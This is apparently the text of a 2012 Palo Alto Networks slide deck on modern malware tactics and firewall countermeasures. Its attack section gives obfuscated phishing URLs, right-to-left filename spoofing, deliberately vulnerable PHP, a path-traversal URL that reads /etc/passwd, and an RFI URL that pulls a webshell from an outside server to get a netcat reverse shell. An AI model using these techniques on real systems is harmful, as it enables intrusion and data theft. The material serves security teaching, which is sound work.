Modern Malware: Tactics & Countermeasures

Modern Malware: Tactics & Countermeasures

General Agenda Tactics of modern malware Countermeasures with Next Generation FW Page 2 2012 Palo Alto Networks

Tactics of Modern Malware

Goal of the session Showing the different stages that take place during a modern malware infection Understanding the sophistication and dedication required to build up an APT (APT Advanced Persistent Threat) Learning the different mechanisms that the attackers use It s important to note that using this tactics against real sites or users may be punished by law Page 4 2012 Palo Alto Networks Slide 4

What has changed / What remains the same The attacker has changed - Nation-States - Criminal organizations - Political groups The strategy has evolved - Patient process, step by step - User compromise and future expansion The technique has evolved - New ways for sending malware - Communication hiding - Signatures evasion It s not the end of the world - It s not new, just more common - There are solutions - Don t believe it has been because of APT Page 5 2012 Palo Alto Networks

Cyber Threats: A National Topic "We know foreign countries and companies swipe our corporate secrets. Now our enemies are also seeking the ability to sabotage our power grid, our financial institutions and our air-traffic control systems. We cannot look back years from now and wonder why we did nothing in the face of real threats to our security and our economy. President Obama State of the Union Address February 2013 "But even more alarming is an attack that happened two months ago when a very sophisticated virus called Shamoon infected computers in the Saudi Arabian State Oil Company Aramco. More than 30,000 computers that it infected were rendered useless and had to be replaced. It virtually destroyed 30,000 computers. Imagine the impact an attack like that would have on your company or your business. The collective result of these kinds of attacks could be a cyber Pearl Harbor. Leon Panetta - Former Director of the CIA, Current Secretary of Defense Page 6 2009 Palo Alto Networks. Proprietary and Confidential.

Recent Victim of a Malware Attack The attack followed an exposé on corruption and influence peddling in China s ruling Communist Party Attackers planted 45-pieces of malware on Times systems 44 of which were undetected by traditional desktop antivirus software Used university networks as a staging ground for the assault Source: http://securityledger.com/new-york-times-hack-puts-antivirus-on-defensive/ Page 7 2009 Palo Alto Networks. Proprietary and Confidential.

The Strategic Role of Modern Malware Infection Escalation Remote Control Malware provides the internal foothold to control and expand a sustained attack

The challenges to traditional security Threats are using different techniques, but security remains segmented Exploits, malware, spyware, obfuscation Threats are using the weak points on security to avoid being discovered The most patient attacks need to go over the perimeter several times without being detected Targeted and customized malware is capable of evading traditional signatures Attacks with new malware, which has never seen before, are increasing Page 9 2012 Palo Alto Networks.

The Gaps in Traditional Antivirus Protection Modern malware is increasingly able to: - Avoid falling into traditional AV honey-pots - Evolve before protection can be delivered Targeted and custom malware Polymorphic malware Newly released malware Highly variable time to protection WildFire finds 200 400 unique new malware samples undetectable by leading antivirus software every day. Page 10 2011 Palo Alto Networks. Proprietary and Confidential.

The Evolving Threat Landscape Hacktivism and Affiliates Low to medium sophistication, politically motivated sabotage and theft Examples: Anonymous, LulzSec, Pr0j3ct M4yh3m Organized Cybercrime Medium to high sophistication, large-scale theft of financial data, hack-for-profit Examples: Russian Business Network Nation-State Actors Highly sophisticated, persistent, and well funded intelligence gathering. Examples: Aurora, Titan Rain, Shady RAT, GhostNet

They have a complex structure usually Botnet kits authors Phising developer Spam senders drive-by experts Carders Page 12 2012 Palo Alto Networks

Lifecycle of a Modern Threat

Stages and processes in modern malware We will cover the technical aspects related to each of these stages Bait Exploit Download Back channel Steal Page 14 2012 Palo Alto Networks

Attack Stages of Modern Malware Targeted malicious email sent to user Malicious website exploits client-side vulnerability User clicks on link to a malicious website Drive-by download of malicious payload Page 15 2011 Palo Alto Networks. Proprietary and Confidential.

Scope of the problem RSA case detailed CVE-2011-0609 Fuentes: http://www.wired.com/threatlevel/2011/08/how-rsa-got-hacked/ http://www.f-secure.com/weblog/archives/00002226.html Page 16 2012 Palo Alto Networks Slide 16

Scope of the problem RSA case detailed Page 17 2012 Palo Alto Networks Slide 17

Baiting the user: content obfuscation

Content obfuscation Definition (Wikipedia): In software development, obfuscated code is the deliberate act of making source or machine code difficult to understand by humans. Programmers may deliberately obfuscate code to conceal its purpose (security through obscurity) or its logic to prevent tampering, deter reverse engineering, or as a puzzle or recreational challenge for someone reading the source code. Page 19 2012 Palo Alto Networks Slide 19

Content obfuscation Target: Deceive the user so that it will click over a URL or malicious file which doesn t look malicious. Evade pattern matching detection systems for malicious code. Actions: Build URLs that don t appear to be malign to the end user, using different mechanisms. Hide real file extensions, using others considered to be benign. Modify the Javascript code to make it unreadable, as an obfuscation tactic to evade pattern matching detection systems. Page 20 2012 Palo Alto Networks Slide 20

URLs obfuscation Use of strings that look good over IPs instead of names: http://192.168.2.90/amazon/account_update/update-now Use of the @ symbol. Everything on the left side of @ is not used (detected by most modern browsers): http://www.bbva.es/system/activate@192.168.2.90/vuln.php Use of lengthy strings so that they don t fit in the browser address bar. URL coding using hex, dword or octal: http://%31%39%32%2e%31%36%38%2e%32%2e%39%30 (http://192.168.2.90) Page 21 2012 Palo Alto Networks Slide 21

URLs obfuscation Use of similar domains, but not valid, hidden under false tags. (note the real link www.cajamadrid.hk- and the one that the attacker is trying to simulate www.cajamadrid.es-): Image mapping with malicious URLs. As soon as the victim clicks anywhere on the image is redirected to a false page, usually similar to the real one. Let s see an example with the following html code and its result: Page 22 2012 Palo Alto Networks Slide 22

Hiding of real file extensions The tactic is known since 2007 but it s now when a lot of activity has been detected in malware (starting specially in 2011). It s based upon the support that Unicode offers to multiple languages, include those where writing is done from right to left (like arabic or hebrew). Unicode has a variety of RTL (Right To Left) and LTR codes (Left To Right) so that after them the content is reversed. Furthermore the codes are invisible. All versions of Windows, starting with Vista, are vulnerable by default. Older versions require the installation of support for RTL languages. Page 23 2012 Palo Alto Networks Slide 23

Hiding of real file extensions: Example First we select the character U+202E with the Windows character map tool (RTL Right To Left): Page 24 2012 Palo Alto Networks Slide 24

Hiding of real file extensions: Example After we rename the file chosing the right name. In our example we will rename notepad.exe as notepad[u+202e]cod.exe : Note that in the Windows CLI the file is properly displayed, including a? character, representing the RTL one. Page 25 2012 Palo Alto Networks Slide 25

Hiding of real file extensions: Example On the other hand, and via the file explorer, the change works (modifying the icon would be trivial as well): These tecniques could be valid also for email addresses or URLs, depending on the client program that the end user is utilizing. Page 26 2012 Palo Alto Networks Slide 26

Hiding of real file extensions: Example It s of course possible playing with more complex names, i.e.: [RTLO]cod.yrammusevituc[LTRO]n1c[LTRO].exe, that will be displayed as nc1.executivesummary.doc in the Windows file explorer. Other O.S. like Ubuntu or MAC are also able to interpret RTL characters: Page 27 2012 Palo Alto Networks Slide 27

Searching for lambs: Scanning and abusing LFI & RFI

RFI Remote File Inclusion Definition (Wikipedia): Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to: Code execution on the web server Code execution on the client-side such as JavaScript... Denial of Service (DoS) Data Theft/Manipulation. Page 29 2012 Palo Alto Networks Slide 29

LFI & RFI attacks Target: Inject some local file in a server where we are not administrators (LFI), or doing it via a redirection to a remote one (RFI), with the goal of using it later as a landing site. Actions: Use LFI/RFI scanners. Search sites by hand. The sites built up using PHP are usually good candidates. Of course it s possible to use alternative tactics to LFI/RFI in order to get the control of the server (for instance all the ones that we reviewed in the event of web attacks). This is just another example on this area. Page 30 2012 Palo Alto Networks Slide 30

LFI+RFI: An example of PHP vulnerable code <html> <head> <title>vulnerable a LFI y RFI</title> </head> <body> <h1>bienvenido a este sitio</h1> <?php $Pagina = isset($_get[ Pagina'])? $_GET[ Pagina'] : 'index.html';?> <p>est&aacutes viendo la p&aacutegina: <?php echo"<a href='$pagina'>$pagina</a>";?></p> <?php include($pagina);?> </body> </html> Page 31 2012 Palo Alto Networks

Exploiting LFI vulnerabilities The page will read the file index.html if it doesn t receive any parameter over $pagina. Let s try now to inject another page into the system, creating a kind of Directory Traversal attack: http://192.168.2.90/vuln.php?pagina=../../../etc/passwd Page 32 2012 Palo Alto Networks

Shell injection via RFI It s possible to exploit RFI vulnerabilities to get, among other stuff, a shell on the exploited server itself (this way we get a site that we can still use later to inject malware, for instance). For this purpose you can use shells encoded with html. There are many available with different features: b374k, c99, r57, locus, c100, All we need to do is exploit the same vulnerability, but as an RFI (Remote File Inclusion), including in the vulnerable parameter the path to a webshell code in another server. For instance: http://192.168.2.90/vuln.php?pagina=http://www.sh3ll.org/locus.txt Page 33 2012 Palo Alto Networks

Exploiting RFI vulnerabilities - WebShell execution (locus) Page 34 2012 Palo Alto Networks

Exploiting RFI vulnerabilities - Getting a back shell Now we have many resources at our disposal. Each webshell offers its own integrated suite of tools. With locus we can for example get access to the system via CLI, through a reverse or back shell For this purpose we will use netcat in the attacker PC, listening in a TCP port where we will get the backshell. In this example we will use 6666: Then we launch the back connect in locus and we check what s going on in netcat Bingo!!! Now we could for instance try a privilege escalation, install a rootkit (later on in this PPT, in the client side),... Page 35 2012 Palo Alto Networks

Summary: Global flow The victim visits the URL and the drive-by download executes Hop Point Victim The victim downloads and installs the malware and becomes a part of the botnet The victim visits the site and is redirected to the malicious URL (iframe) @ Popular websites(landing Site) Malware repository Attacker (y C&C) The attacker injects the URL, in a legitimate site preferably, under his control Page 36 2012 Palo Alto Networks

Countermeasures: Next Generation Firewall

Applications Get Through the Firewall Both internal and external applications are accessible through traditional firewalls... Page 38 2012 Palo Alto Networks.

Applications Get Through the Firewall and can carry inbound threats Page 39 2012 Palo Alto Networks.

Applications Get Through the Firewall and outbound risks Page 40 2012 Palo Alto Networks.

Applications Get Through the Firewall and are increasingly encrypted Page 41 2012 Palo Alto Networks.

Requirementes for a NGFW New requirements for the FW Identify the application Identify the users Scan the application Granular control and visibility Multi-Giga performance Page 42 2012 Palo Alto Networks.

Why Visibility & Control Must Be In The Firewall Application Control as an Add-on Traffic Firewall Port IPS Port-based FW + App Ctrl (IPS) = two policies Applications are threats; only block what you expressly look for Applications Implications Port Policy Decision App Ctrl Policy Decision Network access decision is made with no information Cannot safely enable applications NGFW Application Control Application control is in the firewall = single policy Visibility across all ports, for all traffic, all the time Implications Network access decision is made based on application identity Safely enable application usage Traffic Firewall Applications App Ctrl Policy Decision Application IPS Scan Application for Threats Page 43 2012 Palo Alto Networks.

Fighting Malware in the Cloud

The attacker has many opportunities Time needed to capture the first sample in the wild Time needed to create and verify the malware signature Total exposure time Time needed for updating the virus definitions With traditional signatures you can need weeks until the users are protected Page 45 2012 Palo Alto Networks.

Evolving Threats Require Intelligent Solutions An effective modern malware solution must provide: Visibility See files in all applications, protocols, and ports at all times See files inside SSL, compression, and encoding Visibility into mobile devices and users Detection & Reaction Sandbox-based behavioral analysis of new unknown files Rapid alerting of malware discovered on the network Complete forensics report of the activity of the malware Enforcement Automatic updates of signatures to block threats at the firewall True in-line blocking of infecting files and C&C traffic Stream-based malware blocking to preserve performance Page 46 2012 Palo Alto Networks.

Fighting Malware in the Cloud Centralized malware analysis in the cloud provides key advantages over on-premises solutions: All signatures are rapidly shared with devices globally No need to reprocess files already seen by other customer networks Rapid updating of detection logic (countering VM-aware malware) Cloud safely enables internet access to samples during analysis period No additional on-premises hardware required Page 47 2011 Palo Alto Networks. Proprietary and Confidential.

Architecture Uses two main technologies Virtual sandbox environment Malware signature generator Page 48 2012 Palo Alto Networks. Proprietary and Confidential.

Cloud Architecture File Submission Comparer Virtual Test Environment Cloud Automated Signature Generator Admin Web Portal Files Signatures Page 49 2012 Palo Alto Networks.

The Power of Combining Malware Protection and Application Control

Today s Focus: Evasive Traffic in Malware 1. Send malware or C2 traffic over commonly open ports - Use existing protocols in unexpected ways - Develop custom protocols that meet a specific need of the attacker 2. Use standard protocols over nonstandard ports to avoid signatures signatures Port 80 Port 10000 HTTP

Application Control for Malware Analysis Full stack visibility into all traffic Decodes and identifies traffic regardless of port or evasion Progressive analysis Decodes tunneled protocols and communications Identifies evasive techniques Encryption, proxies, anonymizers, circumventors Shows non-compliant or unknown traffic Not identified by decoders, signatures or heuristics

Evasive Traffic Observed in Malware Newly Detected Malware in Live Networks (April 2012) - Use of non-standard ports, dynamic DNS, use of proxies and custom traffic were most common techniques 16,497 Newly Discovered Malware Samples 66% 80% 59% Undetected by traditional AV vendors 13,256 samples generated Internet traffic Of those samples, 7,918 generated evasive traffic

Common Evasive Behaviors in Malware 5000 4500 4000 3500 3000 Surprisingly little use of IRC 2500 2000 1500 1000 500 0 short h p headers unknown traffic ddns, fas lux domain fake h p nonstandard h p port irc on regular port irc on nonstandard port samples 4470 2615 1777 429 201 8 13

Unknown traffic was both the most common and the most evasive 45000 40000 9.0x 35000 12.8x 30000 25000 20000 3044 samples (23%) generated unknown traffic or fake HTTP 15000 8.1x 10000 5000 10.9x 2.3x 1.5x 3.0x 0 short h p headers unknown traffic ddns, fas lux domain fake h p nonstandard h p port irc on regular port irc on nonstandard port number of sessions 40336 33567 14472 4696 459 12 39 number of samples 4470 2615 1777 429 201 8 13

Opportunity to Manage the Unknowns Unknown traffic is found in significantly high rates in malware as opposed to valid network traffic 11% of malware sessions presented as unknown 0.6% of sessions of enterprise network traffic presents as unknown Based on data from Application Usage and Risk Report based on thousands of networks. Enterprises can progressively reduce the amount of unknown traffic Create custom App-IDs for internally developed or custom applications Shifts the odds in favor of IT over time Page 56

An Integrated Approach to Threat Prevention Applications Sources Known Threats Unknown Threats Visibility and control of all traffic, across all ports, all the time Control traffic sources and destinations based on risk Stop exploits, malware, spying tools, and dangerous files Automatically identify and block new and evolving threats R e d u c i n g R i s k Reduce the attack surface Control the threat vector Control the methods that threats use to hide Sites known to host malware Find traffic to command and control servers SSL decrypt high-risk sites Integrated threat prevention across exploits and malware Stream-based anti-malware based Control threats across any port Behavioral analysis of unknown files Visibility and automated management of unknown traffic Anomalous behaviors Page 57 2012 Palo Alto Networks.

References

References (some ) [1] OWASP Malicious file execution : https://www.owasp.org/index.php/top_10_2007-a3 [2] lionaneesh Understanding LFI & RFI attacks : http://www.go4expert.com/forums/showthread.php?t=26158 [3] Pudja Mansyurin Web Shell (B374k, C99, R57) : http://www.almanshurin.com/programming/web-shell-b374k-c99- r57.html [4] Wayne Huang Drivesploit: Circumventing Automated Detection of Browser Exploits (BlackHat USA 2010) http://www.youtube.com/watch?v=9areqorsqww [5] ESET Drive-by-Download: infección a través de sitios web http://www.eset-la.com/centro-amenazas/articulo/drive-by-downloadinfeccion-web/1792 [6] Microsoft Security Intelligence Report Volume 12 : http://www.microsoft.com/security/sir/default.aspx [7] Lenguaje de programación AutoIT: http://www.autoitscript.com/ Page 59 2012 Palo Alto Networks Slide 59

References (some ) [8] Satyamhax Practical RTLO Unicode Spoofing! : http://esploit.blogspot.com.es/2011/05/practical-rtlo-unicode-spoofing.html [9] BreakingPoint Javascript obfuscations : http://www.breakingpointsystems.com/resources/blog/test-security-equipmentblock-javascript-obfuscations/ [10] F-Secure How we found the file that was used to hack RSA : http://www.f-secure.com/weblog/archives/00002226.html [11] Wikipedia (Varios) http://en.wikipedia.org [12] Symantec Zeus: King of crimeware toolkits : http://www.youtube.com/watch?v=czdbcdpetxk&feature=player_embedded#! [13] Poison Ivy Remote Administration Tool : http://www.poisonivy-rat.com/ [14] Metasploit Penetration Testing Software : http://www.metasploit.com/ Page 60 2012 Palo Alto Networks Slide 60

Thanks for your attention!